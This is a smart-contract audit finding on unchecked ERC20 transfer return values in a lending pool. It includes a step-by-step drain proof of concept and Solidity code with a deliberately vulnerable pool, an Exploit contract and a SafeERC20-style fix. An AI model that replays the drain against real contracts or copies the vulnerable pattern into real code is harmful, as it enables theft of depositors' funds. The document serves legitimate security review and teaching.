The addToPool function takes a poolId and an amount. It first checks that msg.sender is the pool's lender and that the amount is greater than zero. Once those checks pass, it increases the pool's recorded balance and then calls transferFrom to pull the tokens into the contract.
However, some ERC20 tokens do not revert when a transfer fails; they return false instead. Because addToPool does not check the return value, the pool balance is still credited with the new amount even though no tokens were actually received.
After such a failed deposit, removeFromPool lets the lender withdraw funds that were credited to the pool but never received, since the transferFrom returned false instead of reverting.
The same problem affects the borrow function. borrow lets users borrow tokens against collateral, but with a token that returns false on failure the collateral transferFrom can fail silently. An attacker can therefore receive loan tokens without ever providing the required collateral.
The same applies to repay and to every other function that moves tokens without checking the transfer's return value.
The attacker observes that the contract holds a balance of 5000 FakeTokens (a token that returns false instead of reverting on a failed transfer).
The attacker creates a pool and adds 5 FakeTokens to it.
The attacker then calls addToPool to add 4995 FakeTokens to the pool. The transferFrom fails because the attacker does not hold that many tokens, but it returns false instead of reverting, so the pool balance is still credited with 4995.
The attacker then calls removeFromPool with their pool ID and an amount of 5000 FakeTokens. The pool balance covers it, so the contract pays out 5000 tokens from its real holdings and the attacker drains the contract's entire balance of that token.
Drain user funds for any token that returns false instead of reverting when a transfer fails.
Manual Review
Add a check in addToPool that the sum of all pool balances for that token equals the contract's actual balance of the token (token.balanceOf(address(this))), and revert otherwise; in practice this means tracking a per-token total deposited rather than iterating over every pool. Alternatively, and more simply, route every transfer through safeTransfer and safeTransferFrom (for example OpenZeppelin's SafeERC20), which revert when a transfer returns false and also handle tokens that return no value at all.
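The following is an added example that reproduces the pattern described in the finding and the proof of concept above; it is not the audited project's code. FakeToken, VulnerablePool, SafePool, SafeTransfer and Exploit, along with their pool layout and function signatures, are assumptions made for illustration. VulnerablePool credits the pool before an unchecked transferFrom, SafePool uses a transfer helper that performs the same return-value check as OpenZeppelin's SafeERC20, and Exploit replays the 5 / 4995 / 5000 sequence from the proof of concept.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. All contract and function names below
// are illustrative assumptions that reproduce the unchecked-return-value pattern.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

/// Constructed token that returns false instead of reverting when a transfer cannot be made.
/// Allowance handling is omitted to keep the example short.
contract FakeToken is IERC20 {
    mapping(address => uint256) public balanceOf;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _move(msg.sender, to, amount);
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        return _move(from, to, amount);
    }

    function _move(address from, address to, uint256 amount) internal returns (bool) {
        if (balanceOf[from] < amount) return false; // silent failure, no revert
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

/// Vulnerable pattern: pool accounting is updated whether or not the token transfer succeeded.
contract VulnerablePool {
    struct Pool { address lender; IERC20 token; uint256 balance; }
    Pool[] public pools;

    function createPool(IERC20 token, uint256 amount) external returns (uint256 poolId) {
        poolId = pools.length;
        pools.push(Pool(msg.sender, token, amount));
        token.transferFrom(msg.sender, address(this), amount); // return value ignored
    }

    function addToPool(uint256 poolId, uint256 amount) external {
        Pool storage p = pools[poolId];
        require(p.lender == msg.sender, "not lender");
        require(amount > 0, "zero amount");
        p.balance += amount;                                     // credited unconditionally
        p.token.transferFrom(msg.sender, address(this), amount); // a false return is dropped
    }

    function removeFromPool(uint256 poolId, uint256 amount) external {
        Pool storage p = pools[poolId];
        require(p.lender == msg.sender, "not lender");
        require(p.balance >= amount, "insufficient pool balance");
        p.balance -= amount;
        p.token.transfer(msg.sender, amount); // pays out of the contract's real holdings
    }
}

/// Hardened pattern: a helper that reverts on a failed call or a false return value
/// (the check OpenZeppelin's SafeERC20 performs) and is used for every token movement.
library SafeTransfer {
    function safeTransferFrom(IERC20 token, address from, address to, uint256 amount) internal {
        require(address(token).code.length > 0, "not a contract"); // a call to an EOA would "succeed"
        (bool ok, bytes memory ret) = address(token).call(abi.encodeCall(IERC20.transferFrom, (from, to, amount)));
        // tokens that return nothing (USDT-style) pass with ret.length == 0; a returned false reverts
        require(ok && (ret.length == 0 || abi.decode(ret, (bool))), "transfer failed");
    }
}

contract SafePool {
    using SafeTransfer for IERC20;
    struct Pool { address lender; IERC20 token; uint256 balance; }
    Pool[] public pools;

    function addToPool(uint256 poolId, uint256 amount) external {
        Pool storage p = pools[poolId];
        require(p.lender == msg.sender, "not lender");
        require(amount > 0, "zero amount");
        p.token.safeTransferFrom(msg.sender, address(this), amount); // reverts if tokens did not arrive
        p.balance += amount;                                         // credited only after success
    }
}

/// Replays the proof of concept against VulnerablePool; returns the attacker's final balance.
contract Exploit {
    function run() external returns (uint256 attackerBalance) {
        FakeToken token = new FakeToken();
        VulnerablePool pool = new VulnerablePool();
        token.mint(address(pool), 5000);  // constructed: other users' deposits held by the contract
        token.mint(address(this), 5);     // constructed: the attacker's entire holdings

        uint256 id = pool.createPool(token, 5);  // 5 real tokens are deposited
        pool.addToPool(id, 4995);                // transferFrom returns false, balance still += 4995
        pool.removeFromPool(id, 5000);           // paid from the contract's real holdings
        attackerBalance = token.balanceOf(address(this)); // 5000 held, net gain 4995
    }
}
```

The same helper pattern applies to transfer in removeFromPool, to the collateral pull in borrow and to repay; the SafePool contract shows only addToPool because the change is identical at every call site. Against SafePool the addToPool(id, 4995) call in Exploit.run would revert with "transfer failed" and the pool balance would never be credited.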